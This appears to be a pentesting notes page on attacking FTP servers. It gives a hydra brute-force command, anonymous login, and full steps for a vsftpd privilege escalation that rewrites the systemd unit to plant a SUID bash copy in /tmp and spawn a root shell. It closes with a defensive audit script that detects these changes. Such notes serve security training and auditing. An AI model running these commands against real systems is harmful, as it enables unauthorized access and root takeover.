TurboWindX
FTP

Anonymous Login

Some installations of FTP will allow anonymous logins.

ftp <victim_ip> 
anonymous:anonymous

Brute Force

If the server enforces no maximum number of login attempts or any similar lockout mechanism, the login can simply be brute forced.

hydra -l admin -P wordlist.txt victim_ip -t 64 ftp

Privilege Escalation - VSFTPD

If you can edit the vsftpd service file, you can get a root shell.

Modify the service file to run the following commands:

cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell

These commands copy /bin/bash to /tmp/root_shell and set the SUID bit on it, which allows us to execute the binary as its owner, i.e. root.

Edit the /lib/systemd/system/vsftpd.service file to contain the following code:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Once the vsftpd.service file is modified, reload the daemon:

systemctl daemon-reload

This allows us to run the modified service using:

sudo /usr/sbin/service vsftpd restart

A new file, root_shell, should now be available inside the /tmp directory.

Use the file to spawn a root shell.

/tmp/root_shell -p
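
The escalation above depends on a unit file that a non-root user can edit and leaves a SUID binary in /tmp, so both can be checked for on a host. The following audit script is an added example, not part of the original page; the function names and the directories passed in are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page). Function names and the
# directories passed in are assumptions; adjust them for the host audited.

# Unit files writable by group or other: whoever can edit a unit that runs
# as root decides what root executes at the next restart.
writable_units() {
    find "$1" -type f -name '*.service' \( -perm -0020 -o -perm -0002 \) | sort
}

# Unit files with an active (uncommented) Exec* line that sets a
# setuid/setgid bit, e.g. "chmod +xs", "chmod u+s" or "chmod 4755".
suid_setting_units() {
    pat='^Exec[A-Za-z]*=.*chmod[[:space:]]+(-[A-Za-z]+[[:space:]]+)*([ugoa]*\+[rwxXt]*s[rwxXst]*|0?[2467][0-7]{3})[[:space:]]'
    find "$1" -type f -name '*.service' | sort | while IFS= read -r unit; do
        if grep -Eq "$pat" "$unit"; then printf '%s\n' "$unit"; fi
    done
}

# Setuid or setgid regular files under a directory such as /tmp, where
# none are expected.
suid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) | sort
}

# Usage: sh audit.sh /lib/systemd/system /tmp
if [ "$#" -eq 2 ]; then
    writable_units "$1"
    suid_setting_units "$1"
    suid_files "$2"
fi
```

Each function prints one path per finding and prints nothing when the directory is clean. Unit files that are symlinks are skipped by the -type f test.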

Last updated 3 years ago